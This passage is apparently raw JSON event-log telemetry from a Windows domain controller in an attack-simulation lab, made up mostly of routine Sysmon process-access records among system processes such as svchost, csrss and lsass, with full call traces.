|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76823,"ProcessID":852,"ThreadID":1116,"Channel":"System","Message":"The AmazonSSMAgent service entered the running state.","param1":"AmazonSSMAgent","param2":"running","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1161,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:09.959\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:09.959","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1162,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:09.959\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:09.959","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1163,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:14.021\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2968\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2860\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\wer.dll+6dc28|C:\\Windows\\System32\\wer.dll+370d0|C:\\Windows\\System32\\wer.dll+383dc|C:\\Windows\\System32\\wer.dll+13954|C:\\Windows\\System32\\wer.dll+51b6|c:\\windows\\system32\\wuaueng.dll+d4ca8|c:\\windows\\system32\\wuaueng.dll+554a8|c:\\windows\\system32\\wuaueng.dll+4e24b|c:\\windows\\system32\\wuaueng.dll+4e49b|c:\\windows\\system32\\wuaueng.dll+4e5fe|c:\\windows\\system32\\wuaueng.dll+4fb28|c:\\windows\\system32\\wuaueng.dll+5c36f|c:\\windows\\system32\\wuaueng.dll+4d1d5|c:\\windows\\system32\\wuaueng.dll+4c805|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:14.021","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2968","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2860","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\wer.dll+6dc28|C:\\Windows\\System32\\wer.dll+370d0|C:\\Windows\\System32\\wer.dll+383dc|C:\\Windows\\System32\\wer.dll+13954|C:\\Windows\\System32\\wer.dll+51b6|c:\\windows\\system32\\wuaueng.dll+d4ca8|c:\\windows\\system32\\wuaueng.dll+554a8|c:\\windows\\system32\\wuaueng.dll+4e24b|c:\\windows\\system32\\wuaueng.dll+4e49b|c:\\windows\\system32\\wuaueng.dll+4e5fe|c:\\windows\\system32\\wuaueng.dll+4fb28|c:\\windows\\system32\\wuaueng.dll+5c36f|c:\\windows\\system32\\wuaueng.dll+4d1d5|c:\\windows\\system32\\wuaueng.dll+4c805|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1164,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:14.021\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {00000000-0000-0000-0000-000000000000}\r\nTargetProcessId: 2860\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:14.021","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{00000000-0000-0000-0000-000000000000}","TargetProcessId":"2860","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1165,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.275\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.275","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1166,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1167,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.275\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.275","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1168,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.276\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.276","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
